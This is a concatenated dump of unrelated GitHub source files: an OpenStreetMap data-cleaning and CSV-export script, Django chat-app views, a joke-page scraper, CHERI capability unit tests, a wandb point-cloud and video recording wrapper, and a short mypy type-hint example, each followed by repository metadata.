return better_name\n \n\n \n\n return name\n\ndef st_test():\n st_types = audit(OSMFILE)\n\n pprint.pprint(dict(st_types))\n\n for st_type, ways in st_types.items():\n for name in ways:\n better_name = update_name(name, mapping)\n print(name, \"=>\", better_name)\n \nif __name__ == '__main__':\n st_test()\n\n\n# In[35]:\n\n\n\n#Auditing the Cuisine Type\ncuisine_type_re = re.compile(r'\\S+\\.?$',re.IGNORECASE)\ncuisine_types = defaultdict(int)\n\ndef audit_cuisine_type(cuisine_types, cuisine_name):\n m = cuisine_type_re.search(cuisine_name)\n if m:\n cuisine_type = m.group()\n cuisine_types[cuisine_type] += 1\n \n \n #Finding all the differnt categories for Cusine \ndef is_cuisine_name(elem):\n return (elem.tag == \"tag\") and (elem.attrib['k'] == \"cuisine\")\n \n\ndef audit_cuisine():\n for event, elem in ET.iterparse(filename):\n if is_cuisine_name(elem):\n audit_cuisine_type(cuisine_types, elem.attrib['v']) \n print_sorted_dict(cuisine_types) \n\n\nif __name__ == '__main__':\n audit_cuisine()\n \n\n\n# ## Deleting Coffee_Shop as a Cuisine\n\n# In[37]:\n\n#Words included that did not need corrections\nexpected = [\"american\", \"barbecue\", \"burger\", \"chicken\", \"italian\", \"mexican\", \"mixed\", \"sandwich\",\"steak_house\"] \n# Incorrect Cuisine that needs to be deleted \nmapping = { \"coffee_shop\": \" \"}\n\n\n\n\ndef audit_cuisine_type(cuisine_types, cuisine_name):\n n = cuisine_type_re.search(cuisine_name)\n if n:\n cuisine_type = n.group()\n if cuisine_type not in expected:\n cuisine_types[cuisine_type].add(cuisine_name)\n\n\ndef is_cuisine_name(elem):\n return (elem.attrib['k'] == \"cuisine\")\n\n\ndef audit_cuisine(osmfile):\n osm_file = open(osmfile, \"r\", encoding='utf-8')\n cuisine_types = defaultdict(set)\n for event, elem in ET.iterparse(osm_file, events=(\"start\",)):\n\n if elem.tag == \"node\" or elem.tag == \"way\":\n for tag in elem.iter(\"tag\"):\n if is_cuisine_name(tag):\n audit_cuisine_type(cuisine_types, tag.attrib['v'])\n osm_file.close()\n return cuisine_types\n\n# updating the abbreviations \ndef update_cuisine_name(cuisine_name, mapping):\n n = cuisine_type_re.search(cuisine_name)\n if n:\n cuisine_type = n.group()\n better_cuisine_type = cuisine_type\n for problem_cuisine_type in mapping:\n if cuisine_type == problem_cuisine_type:\n better_cuisine_type = mapping[problem_cuisine_type]\n \n better_cuisine_name = cuisine_name.replace(cuisine_type, better_cuisine_type)\n return better_cuisine_name\n \n\n \n\n return cuisine_name\n\ndef cuisine_test():\n cuisine_types = audit_cuisine(OSMFILE)\n\n pprint.pprint(dict(cuisine_types))\n\n for cuisine_type, ways in cuisine_types.items():\n for cuisine_name in ways:\n better_cuisine_name = update_cuisine_name(cuisine_name, mapping)\n print(cuisine_name, \"=>\", better_cuisine_name)\n \nif __name__ == '__main__':\n cuisine_test()\n\n\n\n\n# In[38]:\n\n#Auditing for Further Improvements with Parking lots\namenity_type_re = re.compile(r'\\S+\\.?$', re.IGNORECASE)\namenity_types = defaultdict(int)\n\ndef audit_amenity_type(amenity_types, amenity_name):\n m = amenity_type_re.search(amenity_name)\n if m:\n amenity_type = m.group()\n amenity_types[amenity_type] += 1\n \n \n#Finding the different Amenity types: \ndef is_amenity_name(elem):\n return (elem.tag == \"tag\") and (elem.attrib['k'] == \"amenity\")\n \n\ndef audit_amenity():\n for event, elem in ET.iterparse(filename):\n if is_amenity_name(elem):\n audit_amenity_type(amenity_types, elem.attrib['v']) \n print_sorted_dict(amenity_types) \n\n\nif __name__ == '__main__':\n audit_amenity()\n \n \n\n\n# In[ ]:\n\n#Database Setup \nimport csv\nimport codecs\nimport pprint\nimport re\nimport xml.etree.cElementTree as ET\n\nimport cerberus\n\nimport schema\n\nOSM_PATH = \"FTWORTH.xml\"\n\nNODES_PATH = \"nodes.csv\"\nNODE_TAGS_PATH = \"nodes_tags.csv\"\nWAYS_PATH = \"ways.csv\"\nWAY_NODES_PATH = \"ways_nodes.csv\"\nWAY_TAGS_PATH = \"ways_tags.csv\"\n\nLOWER_COLON = re.compile(r'^([a-z]|_)+:([a-z]|_)+')\nPROBLEMCHARS = re.compile(r'[=\\+/&<>;\\'\"\\?%#$@\\,\\. \\t\\r\\n]')\n\nSCHEMA = schema.schema\n\n# Make sure the fields order in the csvs matches the column order in the sql table schema\nNODE_FIELDS = ['id', 'lat', 'lon', 'user', 'uid', 'version', 'changeset', 'timestamp']\nNODE_TAGS_FIELDS = ['id', 'key', 'value', 'type']\nWAY_FIELDS = ['id', 'user', 'uid', 'version', 'changeset', 'timestamp']\nWAY_TAGS_FIELDS = ['id', 'key', 'value', 'type']\nWAY_NODES_FIELDS = ['id', 'node_id', 'position']\n\n\ndef load_new_tag(element, secondary, default_tag_type):\n \"\"\"\n Load a new tag dict to go into the list of dicts for way_tags, node_tags\n \"\"\"\n new = {}\n new['id'] = element.attrib['id']\n if \":\" not in secondary.attrib['k']:\n new['key'] = secondary.attrib['k']\n new['type'] = default_tag_type\n else:\n post_colon = secondary.attrib['k'].index(\":\") + 1\n new['key'] = secondary.attrib['k'][post_colon:]\n new['type'] = secondary.attrib['k'][:post_colon - 1]\n new['value'] = secondary.attrib['v']\n #print \"!23123\"\n #print secondary.attrib['v']\n #print\"!2312\"\n return new\n\n\ndef shape_element(element, node_attr_fields=NODE_FIELDS, way_attr_fields=WAY_FIELDS,\n problem_chars=PROBLEMCHARS, default_tag_type='regular'):\n \"\"\"Clean and shape node or way XML element to Python dict\"\"\"\n\n node_attribs = {}\n way_attribs = {}\n way_nodes = []\n tags = [] # Handle secondary tags the same way for both node and way elements\n\n if element.tag == 'node':\n for attrib, value in element.attrib.items():\n if attrib in node_attr_fields:\n node_attribs[attrib] = value\n \n # for elements within the top element\n for secondary in element.iter():\n if secondary.tag == 'tag':\n if problem_chars.match(secondary.attrib['k']) is not None:\n continue\n else:\n new = load_new_tag(element, secondary, default_tag_type)\n tags.append(new)\n return {'node': node_attribs, 'node_tags': tags}\n elif element.tag == 'way':\n for attrib, value in element.attrib.items():\n if attrib in way_attr_fields:\n way_attribs[attrib] = value\n \n counter = 0\n for secondary in element.iter():\n if secondary.tag == 'tag':\n if problem_chars.match(secondary.attrib['k']) is None:\n \n \n new = load_new_tag(element, secondary, default_tag_type)\n tags.append(new)\n if secondary.tag == 'nd':\n newnd = {}\n newnd['id'] = element.attrib['id']\n newnd['node_id'] = secondary.attrib['ref']\n newnd['position'] = counter\n counter += 1\n way_nodes.append(newnd)\n \n # print {'way': way_attribs, 'way_nodes': way_nodes, 'way_tags': tags}\n return {'way': way_attribs, 'way_nodes': way_nodes, 'way_tags': tags}\n\n\n# ================================================== #\n# Helper Functions #\n# ================================================== #\ndef get_element(osm_file, tags=('node', 'way', 'relation')):\n \"\"\"Yield element if it is the right type of tag\"\"\"\n\n context = ET.iterparse(osm_file, events=('start', 'end'))\n _, root = next(context)\n for event, elem in context:\n if event == 'end' and elem.tag in tags:\n yield elem\n root.clear()\n\n\ndef validate_element(element, validator, schema=SCHEMA):\n \"\"\"Raise ValidationError if element does not match schema\"\"\"\n if validator.validate(element, schema) is not True:\n field, errors = next(validator.errors.iteritems())\n message_string = \"\\nElement of type '{0}' has the following errors:\\n{1}\"\n error_string = pprint.pformat(errors)\n \n raise Exception(message_string.format(field, error_string))\n\n\n\n# ================================================== #\n# Main Function #\n# ================================================== #\ndef process_map(file_in, validate):\n \"\"\"Iteratively process each XML element and write to csv(s)\"\"\"\n\n with codecs.open(NODES_PATH, 'w', encoding=\"utf-8\") as nodes_file, codecs.open(NODE_TAGS_PATH, 'w', encoding=\"utf-8\") as nodes_tags_file, codecs.open(WAYS_PATH, 'w',encoding=\"utf-8\") as ways_file, codecs.open(WAY_NODES_PATH, 'w',encoding=\"utf-8\") as way_nodes_file, codecs.open(WAY_TAGS_PATH, 'w', encoding=\"utf-8\") as way_tags_file:\n\n nodes_writer = csv.DictWriter(nodes_file, NODE_FIELDS)\n node_tags_writer = csv.DictWriter(nodes_tags_file, NODE_TAGS_FIELDS)\n ways_writer = csv.DictWriter(ways_file, WAY_FIELDS)\n way_nodes_writer = csv.DictWriter(way_nodes_file, WAY_NODES_FIELDS)\n way_tags_writer = csv.DictWriter(way_tags_file, WAY_TAGS_FIELDS)\n\n nodes_writer.writeheader()\n node_tags_writer.writeheader()\n ways_writer.writeheader()\n way_nodes_writer.writeheader()\n way_tags_writer.writeheader()\n\n validator = cerberus.Validator()\n\n for element in get_element(file_in, tags=('node', 'way')):\n el = shape_element(element)\n if el:\n# if validate is True:\n# validate_element(el, validator)\n\n if element.tag == 'node':\n nodes_writer.writerow(el['node'])\n node_tags_writer.writerows(el['node_tags'])\n elif element.tag == 'way':\n ways_writer.writerow(el['way'])\n way_nodes_writer.writerows(el['way_nodes'])\n way_tags_writer.writerows(el['way_tags'])\n\n\nif __name__ == '__main__':\n # Note: Validation is ~ 10X slower. For the project consider using a small\n # sample of the map when validating.\n process_map(OSM_PATH, validate=True)\n\n","repo_name":"txunt2010/Udacity-Open-Street-Map","sub_path":"Ft.+Worth+Open+Street+Map.py","file_name":"Ft.+Worth+Open+Street+Map.py","file_ext":"py","file_size_in_byte":15038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30432123721","text":"from django.shortcuts import redirect, render\nfrom django.views.generic import TemplateView\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.urls import reverse_lazy\nfrom django.views.generic.edit import CreateView\nfrom .forms import CustomSignupForm\nfrom django.contrib.auth.views import LoginView,LogoutView\nfrom .forms import LoginForm,ChatForm,UserNameChangeForm,EmailChangeForm,ImageChangeForm\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom .models import CustomUser\nfrom django.views.generic import DetailView\nfrom django.views.generic import FormView\nfrom .models import Message\nfrom django import forms\nfrom django.http import HttpRequest\nfrom django.contrib.auth.views import PasswordChangeView, PasswordChangeDoneView\n\n\ndef index(request):\n return render(request, \"myapp/index.html\")\n\ndef signup_view(request):\n return render(request, \"myapp/signup.html\")\n\ndef login_view(request):\n return render(request, \"myapp/login.html\")\n\ndef friends(request):\n return render(request, \"myapp/friends.html\")\n\ndef talk_room(request):\n return render(request, \"myapp/talk_room.html\")\n\ndef setting(request):\n return render(request, \"myapp/setting.html\")\n\ndef logout(request):\n return render(request, \"myapp/logout.html\")\n\nclass UserCreateView(CreateView):\n template_name = 'myapp/signup.html'\n form_class = CustomSignupForm\n success_url = reverse_lazy('index')\n\nclass Login(LoginView):\n template_name = 'myapp/login.html'\n form_class = LoginForm\n\ndef Friends(request):\n template_name = \"myapp/friends.html\"\n ctx = {}\n qs = CustomUser.objects.all()\n ctx[\"object_list\"] = qs\n\n return render(request, template_name, ctx)\n\nclass UserDetailView(DetailView):\n template_name = 'myapp/detail.html'\n model = CustomUser\n\ndef lists(request,pk):\n message_list = Message.objects.all()\n form = ChatForm(request.POST or None)\n id = pk\n room_name = CustomUser.objects.get(pk=id)\n user_name = request.user\n context = {\n 'message_list':message_list,\n 'form':form,\n 'room_name':room_name,\n }\n if request.method == 'POST':\n if form.is_valid():\n\n # create()の場合\n Message.objects.create(\n message=form.cleaned_data['message'],\n sent_by=request.user,\n sent_to=CustomUser.objects.get(pk=id)\n )\n\n return render(request, 'myapp/detail.html', context)\n return render(request, 'myapp/detail.html', context)\n\n #送信者と送信相手を自動入力する。\n\nclass Logout(LogoutView):\n template_name = 'myapp/logout.html'\n\nclass PasswordChange(LoginRequiredMixin, PasswordChangeView):\n \"\"\"パスワード変更ビュー\"\"\"\n success_url = reverse_lazy('change_done')\n template_name = 'myapp/password_change.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs) # 継承元のメソッドCALL\n context[\"form_name\"] = \"password_change\"\n return context\n\nclass ChangeDone(LoginRequiredMixin,PasswordChangeDoneView):\n \"\"\"パスワード変更完了\"\"\"\n template_name = 'myapp/change_done.html'\n\nclass UserNameChangeView(LoginRequiredMixin, FormView):\n template_name = 'myapp/change.html'\n form_class = UserNameChangeForm\n success_url = reverse_lazy('change_done')\n \n def form_valid(self, form):\n #formのupdateメソッドにログインユーザーを渡して更新\n form.update(user=self.request.user)\n return super().form_valid(form)\n\n def get_form_kwargs(self):\n kwargs = super().get_form_kwargs()\n # 更新前のユーザー情報をkwargsとして渡す\n kwargs.update({\n 'username' : self.request.user.username,\n })\n return kwargs\n\nclass EmailChangeView(LoginRequiredMixin, FormView):\n template_name = 'myapp/change.html'\n form_class = EmailChangeForm\n success_url = reverse_lazy('change_done')\n \n def form_valid(self, form):\n #formのupdateメソッドにログインユーザーを渡して更新\n form.update(user=self.request.user)\n return super().form_valid(form)\n\n def get_form_kwargs(self):\n kwargs = super().get_form_kwargs()\n # 更新前のユーザー情報をkwargsとして渡す\n kwargs.update({\n 'email' : self.request.user.email,\n })\n return kwargs\n\nclass ImageChangeView(LoginRequiredMixin, FormView):\n template_name = 'myapp/change.html'\n form_class = ImageChangeForm\n success_url = reverse_lazy('change_done')\n \n def form_valid(self, form):\n #formのupdateメソッドにログインユーザーを渡して更新\n form.update(user=self.request.user)\n return super().form_valid(form)\n\n def get_form_kwargs(self):\n kwargs = super().get_form_kwargs()\n # 更新前のユーザー情報をkwargsとして渡す\n kwargs.update({\n 'image' : self.request.user.image,\n })\n return kwargs","repo_name":"65th-NFO-WebSiteTeam/forsteri","sub_path":"forsteri-back/.sample/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16292773655","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri May 15 16:34:12 2020\r\n\r\n@author: 81552\r\n\"\"\"\r\n\r\nimport requests\r\nimport re\r\nfrom bs4 import BeautifulSoup\r\nfilename='糗事百科.txt'\r\nmf=list()\r\n\r\nurl='https://www.qiushibaike.com/text/'\r\nfor i in range(1,7):\r\n if i>1:\r\n url='https://www.qiushibaike.com/text/page/'+str(i)+'/'\r\n r=requests.get(url)\r\n demo = r.text\r\n soup = BeautifulSoup(demo,\"html.parser\")\r\n soup.prettify()\r\n space = [s.extract() for s in soup('br')]\r\n s=str(soup.find_all('div', class_=\"content\")).replace('\\n', '').replace('\\r', '')\r\n m = re.findall(re.compile('(.*?)'),s) \r\n with open(filename,'a',encoding='utf-8') as f:\r\n for joke in m:\r\n print(joke,file=f)\r\n\r\n\r\n \r\n \r\n","repo_name":"JoeyXHY/python-adventures","sub_path":"5页糗事百科.py","file_name":"5页糗事百科.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26438428766","text":"from beritest_tools import BaseBERITestCase\nfrom nose.plugins.attrib import attr\n\n#\n# Test a ccall_fast\n#\n\nclass test_cp2_ccall_fast(BaseBERITestCase):\n\n @attr('capabilities')\n @attr('ccall_hw_2')\n def test_cp2_ccall_fast_1(self):\n '''Test that ccall_fast called the sandbox and returned'''\n self.assertRegisterEqual(self.MIPS.a1, 0x900d,\n \"ccall did not call the sandbox and come back\")\n\n @attr('capabilities')\n @attr('ccall_hw_2')\n def test_cp2_ccall_fast_2(self):\n '''Test that the sandbox inverted the memory array'''\n self.assertRegisterEqual(self.MIPS.a2, 0x08,\n \"the sandbox did not invert the memory array\")\n\n @attr('capabilities')\n @attr('ccall_hw_2')\n def test_cp2_ccall_fast_3(self):\n '''Test that the sandbox zeroed the second memory array'''\n self.assertRegisterEqual(self.MIPS.a3, 0x00,\n \"the sandbox did not zero the second memory array\")\n\n @attr('capabilities')\n @attr('ccall_hw_2')\n def test_cp2_ccall_fast_4(self):\n '''Test that returning from the sandbox cleared $a4'''\n self.assertRegisterEqual(self.MIPS.a4, 0x00,\n \"returning from the sandbox did not clear $a4\")\n\n @attr('capabilities')\n @attr('ccall_hw_2')\n def test_cp2_ccall_fast_5(self):\n '''Test that the sandbox zeroed the second memory array from $a4'''\n self.assertRegisterEqual(self.MIPS.a5, 0x00,\n \"the sandbox did not zero the second memory array from $a4\")\n","repo_name":"CTSRD-CHERI/beri","sub_path":"cheritest/trunk/tests/cp2/test_cp2_ccall_fast.py","file_name":"test_cp2_ccall_fast.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"21"} +{"seq_id":"26746613991","text":"\"\"\"\nTODO:\n- Make a unified plotly plotting function\n- Show more than one env?\n\"\"\"\n\nimport os, sys\n\nimport numpy as np\nimport imageio\nimport pickle\nimport gym\n\n# from bin_env import PokeEnv\nfrom hacman.utils.transformations import to_pose_mat, transform_point_cloud, decompose_pose_mat\n\nimport wandb\nfrom stable_baselines3.common.vec_env.base_vec_env import VecEnv, VecEnvObs, VecEnvStepReturn, VecEnvWrapper\nfrom stable_baselines3.common.vec_env.dummy_vec_env import DummyVecEnv\nfrom stable_baselines3.common.vec_env.subproc_vec_env import SubprocVecEnv, _flatten_obs\nfrom hacman.utils.plotly_utils import plot_pcd, plot_action, plot_pcd_with_score\n# from bin_env.util import angle_diff\nimport plotly.graph_objects as go\nfrom typing import Any, Callable, List, Optional, Sequence, Tuple, Type, Union, Dict\nfrom hacman.algos.location_policy import RandomLocation\n\n \nclass WandbPointCloudRecorder(VecEnvWrapper):\n \"\"\"\n Modified based on VecVideoRecorder.\n \"\"\"\n\n def __init__(self, venv, global_step_counter=None,\n save_plotly=False, foldername=None, \n record_video=False, upload_video=False,\n real_robot=False, log_plotly_once=True):\n\n VecEnvWrapper.__init__(self, venv)\n self.real_robot = real_robot\n # Log plotly once per evaluate_policy call. This is to save space during training.\n self.log_plotly_once = log_plotly_once\n self.env = venv\n # Temp variable to retrieve metadata\n temp_env = venv\n\n # Unwrap to retrieve metadata dict\n # that will be used by gym recorder\n while isinstance(temp_env, VecEnvWrapper):\n temp_env = temp_env.venv\n\n if isinstance(temp_env, DummyVecEnv) or isinstance(temp_env, SubprocVecEnv):\n metadata = temp_env.get_attr(\"metadata\")[0]\n else:\n metadata = temp_env.metadata\n\n self.episode_count = -1\n self.global_step_counter = global_step_counter\n\n self.env.metadata = metadata\n self.save_plotly = save_plotly\n assert not (foldername is None and self.save_plotly), \"Need to specify a folder for WandbPointCloudRecorder.\"\n self.foldername = os.path.join(foldername, 'plotly')\n os.makedirs(self.foldername, exist_ok=True)\n\n self.vis = []\n self.recording = False\n self.title = None\n self.step_count = 0\n self.plot_count = 0\n\n # Video recording\n self.vid_count = 0\n self.record_video = record_video\n self.upload_video = upload_video\n self.vid_dir = os.path.join(foldername, 'video')\n self.cam_frames = []\n\n def reset(self) -> VecEnvObs:\n # This reset will only be called once per evaluate_policy\n # regardless of how many eval epsiodes. This is because\n # VecEnv will reset themselves.\n obs = self.venv.reset()\n self.reset_plotly_logging(obs)\n self.reset_video_recording()\n return obs\n \n def reset_video_recording(self):\n if len(self.cam_frames) == 0:\n return\n\n for i in range(len(self.cam_frames)):\n if len(self.cam_frames[i]) == 0:\n continue\n global_step = self.get_global_step()\n is_success = \"fail\"\n filename = f\"video_{self.vid_count}_{global_step}_{i}_{is_success}.mp4\"\n self.save_video(self.cam_frames[i], filename)\n self.cam_frames[i].clear()\n\n def reset_plotly_logging(self, obs):\n self.recording = True\n self.vis = []\n self.title = None \n self.step_count = 0\n self.episode_count += 1\n self.vis.append(plot_pcd('background', obs['background_pcd_points'][0], 'lightgrey', size=2))\n\n if self.real_robot:\n # Ground truth goal pcd\n goal_pcd = self.venv.envs[0].unwrapped.env.goal_pcd.voxel_down_sample(0.01)\n goal_pcd = np.asarray(goal_pcd.points)\n self.vis.append(plot_pcd(f'goal', goal_pcd, 'blue'))\n # Estimated goal pcd\n goal_pcd = transform_point_cloud(obs['object_pose'][0], obs['goal_pose'][0], obs['object_pcd_points'][0])\n self.vis.append(plot_pcd(f'g_0', goal_pcd, 'lightblue'))\n else:\n goal_pcd = transform_point_cloud(obs['object_pose'][0], obs['goal_pose'][0], obs['object_pcd_points'][0])\n self.vis.append(plot_pcd(f'g_0', goal_pcd, 'blue'))\n \n if 'action_location_score' in obs.keys():\n self.vis.append(plot_pcd_with_score(f'o_0', obs['object_pcd_points'][0], obs['action_location_score'][0]))\n else:\n self.vis.append(plot_pcd(f'o_0', obs['object_pcd_points'][0], 'yellow'))\n return\n \n def enable_video_recording(self):\n self.record_video = True\n \n def disable_video_recording(self):\n self.record_video = False\n\n def get_global_step(self):\n if self.global_step_counter is not None:\n global_step = self.global_step_counter()\n else:\n global_step = self.episode_count\n return global_step\n\n def step_wait(self) -> VecEnvStepReturn:\n obs, rews, dones, infos = self.venv.step_wait()\n \n if self.recording:\n self.title = f\"Final reward: {rews[0]:.2f} success: {infos[0]['is_success']}\"\n self.step_count += 1\n action_location = infos[0]['action_location'][0]\n\n if action_location is None:\n # When not predicting action location (contiguous action),\n # plot from previous gripper position\n if (not hasattr(self, \"prev_obs\")): # Issue with gym0.24 running one step before initialized\n action_location = np.zeros(3)\n elif self.prev_obs is None:\n action_location = np.zeros(3)\n else:\n prev_gripper_pose = self.prev_obs['gripper_pose']\n action_location, _ = decompose_pose_mat(prev_gripper_pose[0])\n \n if 'poke_success' in infos[0].keys() and not infos[0]['poke_success']:\n self.vis.append(plot_action(f'a_{self.step_count-1}', action_location, infos[0]['action_param'], color='orange'))\n else:\n self.vis.append(plot_action(f'a_{self.step_count-1}', action_location, infos[0]['action_param'])) \n \n if dones[0]:\n # DummyVecEnv will reset venv automatically and replace the returned obs\n obj_pcd = infos[0]['terminal_observation']['object_pcd_points'] \n self.vis.append(plot_pcd(f'o_final', obj_pcd, 'mediumpurple'))\n self.close_video_recorder()\n if not self.log_plotly_once:\n self.reset_plotly_logging(obs) \n else:\n if self.real_robot: # Estimated goal pcd\n goal_pcd = transform_point_cloud(obs['object_pose'][0], obs['goal_pose'][0], obs['object_pcd_points'][0])\n self.vis.append(plot_pcd(f'g_{self.step_count}', goal_pcd, 'lightblue'))\n else:\n goal_pcd = transform_point_cloud(obs['object_pose'][0], obs['goal_pose'][0], obs['object_pcd_points'][0])\n self.vis.append(plot_pcd(f'g_{self.step_count}', goal_pcd, 'blue'))\n \n if 'action_location_score' in obs.keys():\n self.vis.append(plot_pcd_with_score(f'o_{self.step_count}', obs['object_pcd_points'][0], obs['action_location_score'][0]))\n else:\n self.vis.append(plot_pcd(f'o_{self.step_count}', obs['object_pcd_points'][0], 'purple'))\n self.vis.append(plot_pcd(f'o_next_{self.step_count-1}', obs['object_pcd_points'][0], 'yellow'))\n \n # Camera recording\n if self.record_video and len(infos[0]['cam_frames']) > 0:\n if len(self.cam_frames) == 0:\n # Initialize cam_frames\n self.cam_frames = [[] for _ in range(len(infos))]\n \n # Append the poke frames to the corresponding cam_frames\n for i, info in enumerate(infos):\n if len(info['cam_frames']) > 0:\n self.cam_frames[i].extend(info['cam_frames'])\n\n if dones[i]:\n global_step = self.get_global_step()\n is_success = \"success\" if infos[i]['is_success'] else \"fail\"\n filename = f\"video_{self.vid_count}_{global_step}_{i}_{is_success}.mp4\"\n self.save_video(self.cam_frames[i], filename)\n self.cam_frames[i].clear()\n\n return obs, rews, dones, infos\n \n\n def save_video(self, frames, filename, fps=10) -> None:\n assert len(frames) > 0, \"No frames to save\"\n global_step = self.get_global_step()\n vid_path = os.path.join(self.vid_dir, filename)\n os.makedirs(self.vid_dir, exist_ok=True)\n\n # Save video locally\n with imageio.get_writer(vid_path, mode='I', fps=fps) as writer:\n for im in frames:\n im = np.flipud(im)\n writer.append_data(im)\n \n self.vid_count += 1\n\n if self.upload_video:\n wandb.log({\"video\": wandb.Video(vid_path, fps=fps, format=\"mp4\"), 'global_steps': global_step})\n \n return\n\n def close_video_recorder(self) -> None:\n if self.recording:\n global_step = self.get_global_step()\n # fig = self.get_plotly_with_slidebar()\n fig = self.get_plotly_with_slidebar()\n # fig.show() # Visualize locally\n wandb.log({\"visualizations\": fig, 'global_steps': global_step})\n\n if self.save_plotly:\n filename = f\"plotly_{global_step}_{self.plot_count}.html\"\n fig.write_html(os.path.join(self.foldername, filename), auto_play=False) # Save as html locally\n self.plot_count += 1\n\n self.recording = False\n self.vis = []\n self.title = None\n self.step_count = 0\n \n def get_plotly_with_slidebar(self):\n vis_name2id = {}\n for i in range(len(self.vis)):\n vis_name2id[self.vis[i].name] = i\n\n fig = go.Figure(self.vis)\n \n # Default\n for dt in fig.data:\n dt.visible = False\n fig.data[vis_name2id['background']].visible = True \n if f'goal' in vis_name2id.keys():\n fig.data[vis_name2id['goal']].visible = True \n fig.data[vis_name2id[f'g_0']].visible = True\n fig.data[vis_name2id[f'o_0']].visible = True\n fig.data[vis_name2id[f'a_0']].visible = True\n\n fig.update_scenes(aspectmode='data')\n fig.update_layout(title=self.title)\n\n steps = []\n for i in range(self.step_count):\n step = dict(\n method=\"update\",\n args=[{\"visible\": [False] * len(fig.data)},\n {\"title\": self.title}],\n )\n step[\"args\"][0][\"visible\"][vis_name2id['background']] = True\n if f'goal' in vis_name2id.keys():\n step[\"args\"][0][\"visible\"][vis_name2id['goal']] = True\n if f'g_{i}' in vis_name2id.keys():\n step[\"args\"][0][\"visible\"][vis_name2id[f'g_{i}']] = True \n step[\"args\"][0][\"visible\"][vis_name2id[f'o_{i}']] = True\n step[\"args\"][0][\"visible\"][vis_name2id[f'a_{i}']] = True\n if i == self.step_count - 1:\n step[\"args\"][0][\"visible\"][vis_name2id[f'o_final']] = True\n else:\n step[\"args\"][0][\"visible\"][vis_name2id[f'o_next_{i}']] = True\n steps.append(step)\n\n sliders = [dict(\n active=0, \n pad={\"t\": 50},\n steps=steps\n )]\n fig.update_layout(sliders=sliders)\n return fig\n \n def get_plotly_with_slidebar_v2(self):\n vis_name2id = {}\n for i in range(len(self.vis)):\n vis_name2id[self.vis[i].name] = i\n \n traces = {}\n for i in range(self.step_count):\n traces[i] = []\n traces[i].append(self.vis[vis_name2id[f'background']])\n if f'goal' in vis_name2id.keys():\n traces[i].append(self.vis[vis_name2id['goal']])\n if f'g_{i}' in vis_name2id.keys():\n traces[i].append(self.vis[vis_name2id[f'g_{i}']])\n traces[i].append(self.vis[vis_name2id[f'o_{i}']])\n traces[i].append(self.vis[vis_name2id[f'a_{i}']])\n \n if i == self.step_count - 1:\n traces[i].append(self.vis[vis_name2id[f'o_final']])\n else:\n traces[i].append(self.vis[vis_name2id[f'o_next_{i}']])\n \n # Final step\n i = self.step_count \n traces[i] = []\n traces[i].append(self.vis[vis_name2id[f'background']])\n if f'goal' in vis_name2id.keys():\n traces[i].append(self.vis[vis_name2id['goal']])\n if f'g_{i-1}' in vis_name2id.keys():\n traces[i].append(self.vis[vis_name2id[f'g_{i-1}']])\n traces[i].append(self.vis[vis_name2id[f'o_final']])\n traces[i].append(self.vis[vis_name2id[f'a_{i-1}']])\n \n fig = go.Figure(\n data=traces[0],\n frames=[\n go.Frame(data=traces[k], name=str(k))\n for k in range(self.step_count+1)\n ]\n )\n fig.frames[-1].data[-1].visible = False\n # Every frame needs to have the same number of traces\n \n # Layout\n fig.update_layout(\n title=self.title,\n width=600,\n height=600,\n scene1=dict(aspectmode='data'),\n updatemenus=[\n {\n \"buttons\": [\n {\n \"args\": [None, self.frame_args(500)],\n \"label\": \"▶\", # play symbol\n \"method\": \"animate\",\n },\n {\n \"args\": [[None], self.frame_args(0)],\n \"label\": \"◼\", # pause symbol\n \"method\": \"animate\",\n },\n ],\n \"direction\": \"left\",\n \"pad\": {\"r\": 10, \"t\": 70},\n \"type\": \"buttons\",\n \"x\": 0.1,\n \"y\": 0,\n }\n ],\n sliders= [\n {\n \"pad\": {\"b\": 10, \"t\": 60},\n \"len\": 0.9,\n \"x\": 0.1,\n \"y\": 0,\n # \"steps\": steps,\n \"steps\": [\n {\n \"args\": [[f.name], self.frame_args(0)],\n \"label\": f'step {str(k)}',\n \"method\": \"animate\",\n }\n for k, f in enumerate(fig.frames)\n ],\n }\n ],\n )\n \n return fig\n \n def frame_args(self, duration):\n return {\n \"frame\": {\"duration\": duration},\n \"mode\": \"immediate\",\n \"fromcurrent\": True,\n \"transition\": {\"duration\": duration, \"easing\": \"linear\"},\n }\n \n\n def close(self) -> None:\n self.close_video_recorder()\n\n # def __del__(self):\n # self.close()\n","repo_name":"HACMan-2023/HACMan","sub_path":"hacman/envs/wandb_wrappers.py","file_name":"wandb_wrappers.py","file_ext":"py","file_size_in_byte":15560,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"21"} +{"seq_id":"3466926196","text":"def cabe(texto: str, alinhamento: bool = True) -> str: # O 'mypy' Só Funciona com estas sintaxes.\n if alinhamento:\n return f\"{texto.title()}\\n{'-'* len(texto)}\"\n else:\n return f\"{texto.title()}\".center(50, '#')\n\nprint(cabe(\"Gow Dikson\"))\n\nprint(cabe(\"Gow Santos\", alinhamento=False))\n#O Comando mypy NomeDoArquivo.py Apontou um erro na linha 11 quando usei uma String ao invés de True:\nprint(cabe(\"Dikson Santos\", alinhamento=True))#160_Tipos_De_Dados_Com_MyPy.py:11: error: Argument \"alinhamento\" ...\n\n# CTRL / -> Comenta todas as linhas selecionadas.\n\n","repo_name":"DiksonSantos/GeekUniversity_Python","sub_path":"160_Tipos_De_Dados_Com_MyPy.py","file_name":"160_Tipos_De_Dados_Com_MyPy.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29626479395","text":"import sys\nfrom os.path import isfile\nimport os.path as path\nbasename = path.dirname(path.dirname(path.abspath(__file__)))\nsys.path.append(path.join(basename,'src'))\n\nfrom feedvalidator.i18n.en import 